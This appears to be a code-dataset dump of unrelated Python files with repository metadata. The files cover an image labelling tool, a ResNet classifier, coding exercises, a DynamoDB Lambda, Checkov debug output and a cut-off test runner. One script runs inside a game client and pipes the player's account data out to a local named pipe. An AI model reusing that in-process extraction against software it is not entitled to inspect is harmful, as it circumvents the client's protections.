self.imagename, _ = os.path.splitext(fullfilename)
labelname = self.imagename + '.txt'
self.labelfilename = os.path.join(self.outDir, labelname)
bbox_cnt = 0
if os.path.exists(self.labelfilename):
with open(self.labelfilename) as f:
for (i, line) in enumerate(f):
if i == 0:
bbox_cnt = int(line.strip())
continue
#tmp = [int(t.strip()) for t in line.split()]
tmp = line.split()
tmp[0] = int(int(tmp[0])/self.factor)
tmp[1] = int(int(tmp[1])/self.factor)
tmp[2] = int(int(tmp[2])/self.factor)
tmp[3] = int(int(tmp[3])/self.factor)
self.bboxList.append(tuple(tmp))
color_index = (len(self.bboxList)-1) % len(COLORS)
tmpId = self.mainPanel.create_rectangle(tmp[0], tmp[1], \
tmp[2], tmp[3], \
width = 2, \
outline = COLORS[color_index])
#outline = COLORS[(len(self.bboxList)-1) % len(COLORS)])
self.bboxIdList.append(tmpId)
self.listbox.insert(END, '%s : (%d, %d) -> (%d, %d)' %(tmp[4], tmp[0], tmp[1], tmp[2], tmp[3]))
self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[color_index])
#self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[(len(self.bboxIdList) - 1) % len(COLORS)])
def saveImage(self):
if self.labelfilename == '':
return
with open(self.labelfilename, 'w') as f:
f.write('%d\n' %len(self.bboxList))
for bbox in self.bboxList:
f.write("{} {} {} {} {}\n".format(int(int(bbox[0])*self.factor),
int(int(bbox[1])*self.factor),
int(int(bbox[2])*self.factor),
int(int(bbox[3])*self.factor), bbox[4]))
#f.write(' '.join(map(str, bbox)) + '\n')
print('Image No. %d saved' %(self.cur))
def mouseClick(self, event):
if self.STATE['click'] == 0:
self.STATE['x'], self.STATE['y'] = event.x, event.y
else:
x1, x2 = min(self.STATE['x'], event.x), max(self.STATE['x'], event.x)
y1, y2 = min(self.STATE['y'], event.y), max(self.STATE['y'], event.y)
self.bboxList.append((x1, y1, x2, y2, self.currentLabelclass))
self.bboxIdList.append(self.bboxId)
self.bboxId = None
self.listbox.insert(END, '%s : (%d, %d) -> (%d, %d)' %(self.currentLabelclass, x1, y1, x2, y2))
self.listbox.itemconfig(len(self.bboxIdList) - 1, fg = COLORS[(len(self.bboxIdList) - 1) % len(COLORS)])
self.STATE['click'] = 1 - self.STATE['click']
def mouseMove(self, event):
self.disp.config(text = 'x: %d, y: %d' %(event.x, event.y))
if self.tkimg:
if self.hl:
self.mainPanel.delete(self.hl)
self.hl = self.mainPanel.create_line(0, event.y, self.tkimg.width(), event.y, width = 2)
if self.vl:
self.mainPanel.delete(self.vl)
self.vl = self.mainPanel.create_line(event.x, 0, event.x, self.tkimg.height(), width = 2)
if 1 == self.STATE['click']:
if self.bboxId:
self.mainPanel.delete(self.bboxId)
COLOR_INDEX = len(self.bboxIdList) % len(COLORS)
self.bboxId = self.mainPanel.create_rectangle(self.STATE['x'], self.STATE['y'], \
event.x, event.y, \
width = 2, \
outline = COLORS[len(self.bboxList) % len(COLORS)])
def cancelBBox(self, event):
if 1 == self.STATE['click']:
if self.bboxId:
self.mainPanel.delete(self.bboxId)
self.bboxId = None
self.STATE['click'] = 0
def delBBox(self):
sel = self.listbox.curselection()
if len(sel) != 1 :
return
idx = int(sel[0])
self.mainPanel.delete(self.bboxIdList[idx])
self.bboxIdList.pop(idx)
self.bboxList.pop(idx)
self.listbox.delete(idx)
def clearBBox(self):
for idx in range(len(self.bboxIdList)):
self.mainPanel.delete(self.bboxIdList[idx])
self.listbox.delete(0, len(self.bboxList))
self.bboxIdList = []
self.bboxList = []
def prevImage(self, event = None):
self.saveImage()
if self.cur > 1:
self.cur -= 1
self.loadImage()
def nextImage(self, event = None):
self.saveImage()
if self.cur < self.total:
self.cur += 1
self.loadImage()
def gotoImage(self):
idx = int(self.idxEntry.get())
if 1 <= idx and idx <= self.total:
self.saveImage()
self.cur = idx
self.loadImage()
def setClass(self):
self.currentLabelclass = self.classcandidate.get()
print('set label class to : %s' % self.currentLabelclass)
if __name__ == '__main__':
root = Tk()
tool = LabelTool(root)
root.resizable(width = True, height = True)
root.mainloop()
| [
"[email protected]"
] | |
de5110ecef9c1e5ac39b92c1b6ed363b2bcedf96 | 91644491699f21add528fbf27753845086b1477f | /hafta4/GarbageTest/GarbageResNet.py | be1c25b7096d64a9c8ac4f269070c364a89fd006 | [] | no_license | SerhatTurann/TezCalismalari | 6ec3eb3c4d827972d2939bde467f7903e9695719 | cc182d05df6fc49ddf83cd2335c233c77673193a | refs/heads/master | 2023-05-10T08:53:07.062066 | 2021-06-16T01:43:32 | 2021-06-16T01:43:32 | 349,109,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | import cv2 #Görüntü işleme kütüphanesi.
import numpy as np #matris işlemleri için kullanılır.
import Tools #Label işlemleri için kendi yazdığımız modül
#Modeli yüklemek ve giriş görüntüsünü hazırlamak için gerekli kütüphaneler.
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.applications.resnet50 import preprocess_input
#Model yüklenir ve etiket işlemleri yapılır.
model = load_model('models\model_resnet50_10-0.82.h5')
labels, lb = Tools.labels()
def TahminEt(image):
#Gelen görüntü okunur ve modelin girişine hazırlanır.
output = image.copy()
image = cv2.resize(image,(224,224))
image = preprocess_input(image)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
#Hazırlanan görüntü modele verilir ve tahmin sonucu alınır.
#Etiketleri Türkçeye çevirilir, yüzdelik değerleri hesaplanır.
proba = model.predict(image)[0]
idx = np.argmax(proba)
label = lb.classes_[idx]
label = Tools.cevir(label)
label = "{}: {:.2f}% ".format(label, proba[idx] * 100)
output = cv2.putText(output, label+'-'+'ResNet', (10, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 255), 2)
output = cv2.resize(output, (300, 300))#Görüntü üzerine bu bilgiler yazılır.
return output #Görüntü döndürülür. | [
"[email protected]"
] | |
66af6fc6a28ba2a298d0c17907ca815b967fe066 | 993657cb2aabbe7bd1d705938b566384cc34918c | /JCF/pb37-44.py | 37a5d268f8e7d2c0edb4b1ec7166c0457e13787b | [] | no_license | Screwlim/Algorithms | d89e9f57cd022900341d2df6466390ad787ea00d | a5dd9b30a20bf4b75f568c18d99d0a089e1aa9d6 | refs/heads/master | 2020-07-27T03:37:38.667858 | 2020-02-25T14:25:37 | 2020-02-25T14:25:37 | 208,854,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,988 | py | #pb37
'''
print('pb37-----------------------------------')
poll = input().split(" ")
count = 0
for i in range(1,len(poll)):
if poll.count(poll[i-1]) < poll.count(poll[i]):
res = i
print(poll[res] + '가 총 ' + str(poll.count(poll[res])) + '표로 반장이 되었습니다.')
#pb38
print('pb38-----------------------------------')
scores = [int(i) for i in input().split(' ')]
candy = 0
for i in range(3):
top = max(scores)
candy += scores.count(top)
for j in range(scores.count(top)):
scores.remove(top)
print(candy)
#pb39
print('pb39-----------------------------------')
l = input()
print(l.replace('q', 'e'))
#pb40
print('pb40-----------------------------------')
limit = int(input())
fnum = int(input())
onnum = 0
onboard = 0
for i in range(fnum):
onboard += int(input())
if onboard <= limit:
onnum += 1
print(onnum)
#pb41
print('pb41-----------------------------------')
num = int(input())
for i in range(2,num):
if num%i == 0:
print('NO')
break
if i == num-1:
print('YES')
#pb42
print('pb42-----------------------------------')
#라이브러리 활용을 할 수 있는가
import datetime
#요일은 weekday()로 0-6 = 일 - 토 순으로 반환
m = int(input())
d = int(input())
def Day(a, b):
day = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
return day[datetime.date(2020, a, b).weekday()]
print(Day(m, d))
'''
#pb43
print('pb43-----------------------------------')
num = int(input())
res = []
while True:
res.append(str(num%2))
num = num//2
if num == 1:
res.append(str(1))
break
'''
for i in range(len(res)-1, -1, -1):
print(res[i], end='')
'''
res.reverse()
print(''.join(res))
#join을 활성화 하려면 res안에 있는 값이 다 str형이어야 함
#그러면 str == 모든 원소가 str형인 list?
#pb44
print('pb44-----------------------------------')
num = input()
total = 0
for i in num:
total += int(i)
print(total) | [
"[email protected]"
] | |
9a52a06a94e3a2e77b20377abdd1941d2de5376f | 8e866c25e4af2430b2bd687d929a3ac9cdc16920 | /parametros/migrations/0002_tipoincremento_descripciontipoincr.py | c96d8b017882f3cc72ef67d1cf544f9b1a9f1b72 | [] | no_license | ibuilder/Prefact | 9ea481e93f4658dbdc569224a713609dba6ef8f1 | c1d7cefce92d3cd66122292fed68300e03ff033a | refs/heads/master | 2022-01-09T13:28:55.817499 | 2018-11-09T22:02:45 | 2018-11-09T22:02:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 01:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parametros', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='tipoincremento',
name='descripcionTipoIncr',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| [
"[email protected]"
] | |
14bc6748e329b63cedbea996df25b3276bef925d | 2c4b07e4f77e60e654aa0b8501e46172d0fa3d92 | /bridge/assets/client_windows.py | 626910262e4735ea40853a75cd4e4fde21d96402 | [] | no_license | lczxxx123/yyx-bridge | cfd3f75be37cd32f9eac9f114c4f779c67a95b2c | 7ff1b875884455cfc7b97aeb0dfb616537e065ee | refs/heads/master | 2023-06-29T14:35:15.439591 | 2020-09-13T01:53:11 | 2020-09-13T01:53:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,603 | py | import json
import Globals
from DynamicConfigData import DATA_HERO, DATA_EQUIP_ATTR, DATA_EQUIP_INIT, DATA_EQUIP_RANDOM_ATTR, DATA_STORY
import com.utils.helpers as helpers
import com.const as CONST
f = open(r'\\.\pipe\b62340b3-9f87-4f38-b844-7b8d1598b64b', 'wb+', buffering=0)
try:
player = Globals.player1
if player == None:
raise Exception('Player data not available.')
heroTypeList = [
CONST.HeroType.SS_MONSTER, CONST.HeroType.SS_GHOST, CONST.HeroType.SS_ELF]
equip_attr_types = [
'maxHpAdditionVal', 'defenseAdditionVal', 'attackAdditionVal', 'maxHpAdditionRate',
'defenseAdditionRate', 'attackAdditionRate', 'speedAdditionVal', 'critRateAdditionVal', 'critPowerAdditionVal',
'debuffEnhance', 'debuffResist']
equip_attr_type_map = {value: key for (
key, value) in enumerate(equip_attr_types)}
def map_equip(id, equip):
initData = DATA_EQUIP_INIT.data.get(equip.equipId)
attrs = []
tmpList = equip.getRandAttrDict()
for key, value in tmpList.items():
attrs.append([equip_attr_type_map[key], value])
base_attr = [equip_attr_type_map[equip.baseAttrName],
equip.strengthenedBaseAttrValue]
single_attrs = DATA_EQUIP_RANDOM_ATTR.data.get(
equip.single_attr, {}).get('attrs') if equip.single_attr else []
single_attrs = [[equip_attr_type_map[
attr[0]], attr[1]] for attr in single_attrs]
return [
id,
# 'name': equip.name,
equip.suitId,
equip.getEquipInit('quality'),
equip.getPos(),
equip.equipId,
equip.strongLevel,
equip.born,
bool(equip.lock),
bool(equip.garbage),
# 'strengthened_base_attr_value': equip.strengthenedBaseAttrValue,
# 'base_attr': equip.baseAttrDict,
# 'attr': equip.attrDict,
# 'random_attr': equip.randomAttrDict,
# 'init_data': initData,
# 'rand_attr_rates': equip.randAttrRates,
attrs,
base_attr,
attrs,
[],
single_attrs
]
def map_hero(id, hero):
attr_calc = hero.getUnAwakeBattleAttr(
) if hero.awake == 0 else hero.getAwakeBattleAttr()
return [
id,
# 'uid': hero.uid,
hero.heroId,
hero._equips,
hero._level,
hero.exp,
# hero._name,
hero.nickName,
hero.born,
bool(hero.lock),
hero.rarity,
hero.skillList,
hero.awake,
hero.star,
[
[
attr_calc.baseMaxHp,
attr_calc.maxHpAdditionVal,
attr_calc.maxHpAdditionRate,
attr_calc.maxHp,
],
[
attr_calc.baseSpeed,
attr_calc.speedAdditionVal,
attr_calc.speedAdditionRate,
attr_calc.speed,
],
[
attr_calc.baseCritPower,
attr_calc.critPowerAdditionVal,
attr_calc.critPowerAdditionRate,
attr_calc.critPower,
],
[
attr_calc.baseCritRate,
attr_calc.critRateAdditionVal,
attr_calc.critRateAdditionRate,
attr_calc.critRate,
],
[
attr_calc.baseDefense,
attr_calc.defenseAdditionVal,
attr_calc.defenseAdditionRate,
attr_calc.defense,
],
[
attr_calc.baseAttack,
attr_calc.attackAdditionVal,
attr_calc.attackAdditionRate,
attr_calc.attack,
],
attr_calc.debuffEnhance,
attr_calc.debuffResist
]
]
def get_item_presets():
preset_items = helpers.getUserConfig('equipDrawer', [])
preset_names = helpers.getUserConfig('equipDrawerName', [])
presets = []
for i, items in enumerate(preset_items):
presets.append([preset_names[i], items])
return presets
def get_hero_shards():
def map(id, data):
book = data['book']
return [
id, # hero_id
player.currency.get(book[1], 0), # shard_count
player.currency.get(book[0], 0), # book_count
book[2] # book_max_shard_count
]
return [map(id, data) for id, data in DATA_HERO.data.items() if data['type'] in heroTypeList]
def map_realm_card(id, card):
return [
id,
card.itemid,
card.totalTime,
card.produceValue,
]
def get_story_tasks():
items = []
for id, _ in DATA_HERO.data.iteritems():
if id < 200 or id > 600:
continue
storyData = DATA_STORY.data.get(id)
if storyData != None:
ids = storyData.get('activityId')
if ids != None:
for id in ids:
items.append([
id, Globals.jobMgr.getJobProg(id)
])
return items
data = [
[player.short_id, player.server_id, player.name, player.level],
map(lambda v: int(v), [
player.currency.get(CONST.CurrencyType.COIN, 0), # COIN
player.currency.get(CONST.CurrencyType.GOLD, 0), # GOUYU
player.currency.get(
CONST.CurrencyType.STRENGTH, 0), # STRENGTH
player.currency.get(900273, 0), # YINGBING
player.currency.get(900012, 0), # RONGYU
player.currency.get(900016, 0), # XUNZHANG
player.currency.get(900090, 0), # GONGXUN
player.currency.get(900215, 0), # YLJZS
player.currency.get(900000, 0), # HUNYU
player.currency.get(900023, 0), # PIFU
player.currency.get(900024, 0), # TUPO
player.currency.get(490002, 0), # BAIPIAO broken_amulet
player.currency.get(490001, 0), # LANPIAO mystery_amulet
player.currency.get(490004, 0), # XIANSHI ar_amulet
player.currency.get(900178, 0), # YUZHA ofuda
player.currency.get(900188, 0), # JINYUZHA gold_ofuda
player.currency.get(900216, 0), # 八岐大蛇鳞片 scale
player.currency.get(900217, 0), # 大蛇的逆鳞 reverse_scale
player.currency.get(900218, 0), # 逢魔之魂 demon_soul
player.currency.get(900041, 0), # 痴念之卷 foolery_pass
player.currency.get(906058, 0) # SP皮肤券
]),
[map_hero(id, i) for id, i in player.heroes.items()
if DATA_HERO.data.get(i.heroId).get('type') in heroTypeList],
[map_equip(id, e) for id, e in player.inventory.items()],
get_item_presets(),
get_hero_shards(),
[map_realm_card(id, data)
for id, data in Globals.player1.myJiejieCardDataDict.items()],
get_story_tasks()
]
f.write(json.dumps(data, ensure_ascii=False).encode('utf8'))
except Exception as e:
f.write(json.dumps({
'error': str(e)
}, ensure_ascii=False).encode('utf8'))
f.close()
| [
"[email protected]"
] | |
502be4bc987b6810c8c21512e61f399778f76f09 | 77b07ca84c059d264cbfabc872d03d66b454aa44 | /Calc.py | 34ba6f4bfb83b83af2399ebf4875d535953eb039 | [] | no_license | 10376086/AdvancedProgramming- | 44784a9acf58f5d83c55de8b30abb49ad61de866 | 7ef3e94042dbde19a177a700017b2e9ed016fda6 | refs/heads/master | 2020-04-15T23:42:09.253799 | 2019-01-10T20:16:40 | 2019-01-10T20:16:40 | 165,114,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py |
def add(first, second):
return first + second
def subtract(first, second):
return first + second
def multiply(first, second):
    """Return the product of the two operands."""
    product = first * second
    return product
"[email protected]"
] | |
bdec81e74eafb8a5c8eef6e571073c135807f327 | 17697a5d83991139de35524dc5369a67ebc48335 | /bottom_view.py | c2c3364c492b26d6721e4b719a342ff40f56b4fd | [] | no_license | troj4n/Trees | 3f4c1f0b62fd79225fdf596f01adfd8695a73954 | dbd5fbefb4a4b799b042fd8cdc0f613e86367397 | refs/heads/master | 2020-06-04T05:31:40.173514 | 2019-06-21T09:55:35 | 2019-06-21T09:55:35 | 191,889,687 | 0 | 0 | null | 2019-06-14T09:52:48 | 2019-06-14T06:41:10 | Python | UTF-8 | Python | false | false | 1,640 | py | # coding: utf-8
# Your code here!
from collections import deque
#initialise node
class Node:
def __init__(self,data):
self.data=data
self.left=None
self.right=None
self.hd=None
def findBottomView(root):
    """Print the bottom view of a binary tree (Python 2 syntax).

    Performs a breadth-first traversal, tagging every node with its
    horizontal distance (hd) from the root: left child = parent hd - 1,
    right child = parent hd + 1.  For each hd the last node visited in
    level order is the one visible from below.

    NOTE(review): the output order depends on hd_dict's iteration order,
    which is not sorted by hd - confirm whether strictly left-to-right
    output is required.
    """
    if root==None:
        return
    hd=0
    root.hd=hd
    # dictionary mapping horizontal distance -> data of the last node seen there
    hd_dict={}
    q=deque()
    # BFS starts from the root (hd 0)
    q.append(root)
    while q:
        # pop nodes in level order; each node's hd was set when it was enqueued
        temp=q.popleft()
        hd=temp.hd
        # ensure the key exists (default 0), then ...
        hd_dict[hd]=hd_dict.get(hd,0)
        # ... overwrite with the latest node on this horizontal distance
        hd_dict[hd]=temp.data
        # left child sits one step further left
        if temp.left!=None:
            q.append(temp.left)
            temp.left.hd=temp.hd-1
        # right child sits one step further right
        if temp.right!=None:
            q.append(temp.right)
            temp.right.hd=temp.hd+1
    # print all collected bottom-view values
    result=hd_dict.values()
    print ' '.join(str(x) for x in result)
# Build the sample tree from the classic bottom-view example:
#              20
#            /    \
#           8      22
#          / \    /  \
#         5  30  4    25
#            / \
#           10  14
root=Node(20)
root.left=Node(8)
root.right=Node(22)
root.left.left=Node(5)
root.left.right=Node(30)
root.right.left=Node(4)
root.right.right=Node(25)
root.left.right.left=Node(10)
root.left.right.right=Node(14)
print "Bottom view of the tree is "
findBottomView(root)
| [
"[email protected]"
] | |
9e41b715ddb0c07119dda3e386a628a8d2cc9564 | 867c8f58096777714fb6617669348bb8898811c3 | /devGetOffers.py | 437c3581a628d2a5c878c22e06ed4e6df078b38c | [] | no_license | dazuna/PyScripts-for-AWS-Serverless | f41c4e0fe22a1824e56c79d00cd24a77a501650a | 4136923cab12cc1c2d4610b1ce68e6e04f2ea4d5 | refs/heads/master | 2022-11-06T04:31:54.392129 | 2020-06-21T19:24:33 | 2020-06-21T19:24:33 | 273,969,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | import boto3
import json
import decimal
from boto3.dynamodb.conditions import Key, Attr
dynamo = boto3.client('dynamodb')
def respond(err, res=None):
    """Build an API Gateway proxy response.

    Returns HTTP 400 with the error text when *err* is truthy, otherwise a
    200 response whose body is *res* serialized as JSON (Decimal-safe via
    DecimalEncoder).
    """
    return {
        'statusCode': '400' if err else '200',
        # str(err) works for any exception; the old err.message attribute is
        # deprecated and absent from most exception types (removed in Python 3).
        'body': str(err) if err else json.dumps(res, cls=DecimalEncoder),
        'headers': {
            'Content-Type': 'application/json',
        },
    }
def lambda_handler(event, context):
    """AWS Lambda entry point.

    Reads the request's query-string parameters, fetches the matching
    offers from DynamoDB and wraps them in an API Gateway response.
    """
    qsParam = event['queryStringParameters']
    offers = getOffers(qsParam)
    return respond(None, offers)
def getOffers(qsParam):
    """Scan the 'Offers' DynamoDB table, optionally filtered by query params.

    Supports filtering by exact company id ('company') or a substring match
    on the search field ('companyName'); with no parameters the whole table
    is returned.
    """
    # Get the service resource and the table handle.
    dynamodb = boto3.resource('dynamodb')
    table = dynamodb.Table('Offers')
    if qsParam is not None:
        # 'in' replaces dict.has_key(), which was removed in Python 3
        # (equivalent behavior on Python 2 dicts as well).
        if 'company' in qsParam:
            return table.scan(FilterExpression=Attr('company').eq(qsParam['company']))
        if 'companyName' in qsParam:
            return table.scan(FilterExpression=Attr('searchField').contains(qsParam['companyName']))
        # NOTE(review): falls through to an implicit None when qsParam has
        # neither key - confirm whether a full scan was intended here.
    else:
        return table.scan()
# hItems = json.dumps(hItems, cls=DecimalEncoder)
class DecimalEncoder(json.JSONEncoder):
    """JSON encoder that serializes decimal.Decimal values as floats."""

    def default(self, obj):
        if not isinstance(obj, decimal.Decimal):
            # Defer everything else to the base class (raises TypeError).
            return super(DecimalEncoder, self).default(obj)
        return float(obj)
| [
"[email protected]"
] | |
81a3bb51d5a1e975a28e398874c80a57e85d3738 | d6f7be19eedb72f9c3a5ac7de83133232c21d395 | /app/extract.py | 3001e6b21730733e3399d2bb8b5b22547172e334 | [
"MIT"
] | permissive | kmalakhova/back-end-mempeasy | 6a2723b54eebc86496eda7c3c65b3f7b6df6e4ef | 9d918d97fa88189b1dbaf8b0ac6fe430c449a661 | refs/heads/master | 2023-07-16T05:58:50.178178 | 2021-08-24T01:19:50 | 2021-08-24T01:19:50 | 390,390,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | def json_extract(obj, key):
"""Recursively fetches values from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively searches for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key and len(v.split()) != 1:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
values = extract(obj, arr, key)
return values
| [
"[email protected]"
] | |
2fff8b0b4c27cbdf63118589f635f7007234d0ac | daf3c52a9a26e00e1502b4c991b5d7777d444469 | /src/analyzer/abstract_reader.py | 78dc16fe2e225b1aab61a74e3c9c5851afe06c07 | [
"MIT"
] | permissive | rodchenk/time-expenses | a22a5b0ff21feaca65e2c17bc9ed4e23bae93174 | b0b37f00514c9f54300097a01f53f8923937caa9 | refs/heads/master | 2022-10-28T19:59:13.703717 | 2020-06-06T14:20:21 | 2020-06-06T14:20:21 | 267,668,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py |
class AbstractReader(object):
    """Base class collecting per-file content statistics.

    Subclasses are expected to fill in the ``total_*`` counters; this base
    only stores them and reports them via :meth:`get_stats`.
    """

    def __init__(self, counter_callback, filename):
        self._counter = counter_callback  # invoked once per get_stats() call
        self.filename = filename
        self.total_chars = 0
        self.total_words = 0
        self.total_charts = 0
        self.total_images = 0
        self.total_tables = 0

    def get_stats(self):
        """Invoke the progress counter and return the accumulated statistics."""
        self._counter()
        return {
            'file': self.filename,
            'chars': self.total_chars,
            'words': self.total_words,
            'charts': self.total_charts,
            'images': self.total_images,
            'tables': self.total_tables,
        }
"[email protected]"
] | |
dd5617275d2a87e52a380d2ccfcdf4777e0566ba | 45e376ae66b78b17788b1d3575b334b2cb1d0b1c | /checkov/common/graph/checks_infra/debug.py | 26b247b24b08837b95bd15668c25aedf4d45d7c6 | [
"Apache-2.0"
] | permissive | bridgecrewio/checkov | aeb8febed2ed90e61d5755f8f9d80b125362644d | e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d | refs/heads/main | 2023-08-31T06:57:21.990147 | 2023-08-30T23:01:47 | 2023-08-30T23:01:47 | 224,386,599 | 5,929 | 1,056 | Apache-2.0 | 2023-09-14T20:10:23 | 2019-11-27T08:55:14 | Python | UTF-8 | Python | false | false | 6,589 | py | from __future__ import annotations
import json
import logging
from collections.abc import Iterable
from typing import Any, TYPE_CHECKING
import yaml
from termcolor import colored
from checkov.common.graph.graph_builder import CustomAttributes
from checkov.common.resource_code_logger_filter import add_resource_code_filter_to_logger
from checkov.common.util.env_vars_config import env_vars_config
if TYPE_CHECKING:
from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
logger = logging.getLogger(__name__)
add_resource_code_filter_to_logger(logger)
def graph_check(check_id: str, check_name: str) -> None:
    """Print the graph policy currently being evaluated (debug mode only)."""
    if env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
        print(f'\nEvaluating graph policy: "{check_id}" - "{check_name}"')
def resource_types(resource_types: Iterable[str], resource_count: int, operator: str) -> None:
    """Print the resource types matched against an operator (debug mode only)."""
    if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
        return

    joined = '", "'.join(resource_types)
    msg = f'\nFound {resource_count} resources with resource types: "{joined}" to check against operator: "{operator}"'
    print(msg)
def attribute_block(
    resource_types: Iterable[str],
    attribute: str | None,
    operator: str,
    value: str | list[str] | None,
    resource: dict[str, Any],
    status: str,
) -> None:
    """Print an attribute condition and the resource it was evaluated on (debug mode only)."""
    if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
        return

    block_conf = _create_attribute_block(
        resource_types=resource_types, attribute=attribute, operator=operator, value=value
    )

    print("\nEvaluated block:\n")
    print(colored(yaml.dump([block_conf], sort_keys=False), "blue"))
    print("and got:")
    # Green for a pass, red for anything else.
    status_color = "green" if status == "passed" else "red"
    print(colored(f'\nResource "{resource[CustomAttributes.ID]}" {status}:', status_color))
    print(colored(json.dumps(resource[CustomAttributes.CONFIG], indent=2), "yellow"))
def connection_block(
    resource_types: Iterable[str],
    connected_resource_types: Iterable[str],
    operator: str,
    passed_resources: list[dict[str, Any]],
    failed_resources: list[dict[str, Any]],
) -> None:
    """Print a connection condition with its passed/failed resource ids (debug mode only)."""
    if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
        return

    block_conf = _create_connection_block(
        resource_types=resource_types,
        connected_resource_types=connected_resource_types,
        operator=operator,
    )
    passed_ids = '", "'.join(r[CustomAttributes.ID] for r in passed_resources)
    failed_ids = '", "'.join(r[CustomAttributes.ID] for r in failed_resources)

    print("\nEvaluated blocks:\n")
    print(colored(yaml.dump([block_conf], sort_keys=False), "blue"))
    print("and got:\n")
    print(colored(f'Passed resources: "{passed_ids}"', "green"))
    print(colored(f'Failed resources: "{failed_ids}"', "red"))
def complex_connection_block(
    solvers: list[BaseSolver],
    operator: str,
    passed_resources: list[dict[str, Any]],
    failed_resources: list[dict[str, Any]],
) -> None:
    """Print a composite (and/or) connection condition and its results (debug mode only).

    Each child solver is rendered as the YAML-ish dict of its condition;
    nested composite solvers are abbreviated to "..." placeholders.
    """
    if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
        return

    # to prevent circular dependencies
    from checkov.common.checks_infra.solvers.attribute_solvers.base_attribute_solver import BaseAttributeSolver
    from checkov.common.checks_infra.solvers.complex_solvers.base_complex_solver import BaseComplexSolver
    from checkov.common.checks_infra.solvers.connections_solvers.base_connection_solver import BaseConnectionSolver
    from checkov.common.checks_infra.solvers.connections_solvers.complex_connection_solver import (
        ComplexConnectionSolver,
    )
    from checkov.common.checks_infra.solvers.filter_solvers.base_filter_solver import BaseFilterSolver

    complex_connection_block = []
    # Dispatch on solver type; isinstance order matters (see comment below).
    for solver in solvers:
        if isinstance(solver, BaseAttributeSolver):
            block = _create_attribute_block(
                resource_types=solver.resource_types,
                attribute=solver.attribute,
                operator=solver.operator,
                value=solver.value,
            )
        elif isinstance(solver, BaseFilterSolver):
            block = _create_filter_block(attribute=solver.attribute, operator=solver.operator, value=solver.value)
        elif isinstance(solver, (ComplexConnectionSolver, BaseComplexSolver)):
            # ComplexConnectionSolver check needs to be before BaseConnectionSolver, because it is a subclass
            block = {solver.operator: ["..." for _ in solver.solvers]}
        elif isinstance(solver, BaseConnectionSolver):
            block = _create_connection_block(
                resource_types=solver.resource_types,
                connected_resource_types=solver.connected_resources_types,
                operator=solver.operator,
            )
        else:
            # Unknown solver types are logged and skipped rather than rendered.
            logger.info(f"Unsupported solver type {type(solver)} found")
            continue

        complex_connection_block.append(block)

    passed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in passed_resources)
    failed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in failed_resources)

    print("\nEvaluated blocks:\n")
    print(colored(yaml.dump([{operator: complex_connection_block}], sort_keys=False), "blue"))
    print("and got:\n")
    print(colored(f'Passed resources: "{passed_resources_str}"', "green"))
    print(colored(f'Failed resources: "{failed_resources_str}"', "red"))
def _create_attribute_block(
resource_types: Iterable[str], attribute: str | None, operator: str, value: str | list[str] | None
) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "attribute",
"resource_types": resource_types,
"attribute": attribute,
"operator": operator,
}
if value is not None:
attribute_block_conf["value"] = value
return attribute_block_conf
def _create_connection_block(
resource_types: Iterable[str], connected_resource_types: Iterable[str], operator: str
) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "connection",
"resource_types": resource_types,
"connected_resource_types": connected_resource_types,
"operator": operator,
}
return attribute_block_conf
def _create_filter_block(attribute: str | None, operator: str, value: str | list[str]) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "filter",
"attribute": attribute,
"operator": operator,
"value": value,
}
return attribute_block_conf
| [
"[email protected]"
] | |
5c3a9fa4804996502108001cdc92415cd75c53d1 | 037e7828fcc4779629bf9089d0677abbae6590eb | /run_test_raas.py | 9622b17e28cf6e447e02d2dd685d109fc5795007 | [] | no_license | ARMmbed/run_tests_linux | af11a82372e0480fa5b9c883607d7fe279da8931 | de643663227b9d2cdca884fa67575f1ce48e9196 | refs/heads/master | 2023-03-16T13:56:40.577605 | 2017-02-28T17:28:11 | 2017-02-28T17:28:11 | 58,552,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,230 | py | import raas_client
def run_test_raas(binary, platform_name="K64F"):
    """Flash *binary* onto a remote RAAS board, reset it and capture serial output (Python 2).

    Allocates a board of *platform_name* from the RAAS server, flashes the
    binary, opens a 9600-baud line-mode serial connection, resets the target
    and reads lines until a 15 s timeout yields an empty string.  Returns
    the captured serial output as one string.  The client is always
    disconnected, even on failure.
    """
    print "Running", binary
    print "On", platform_name
    # NOTE(review): RAAS server address is hard-coded - confirm it is still valid.
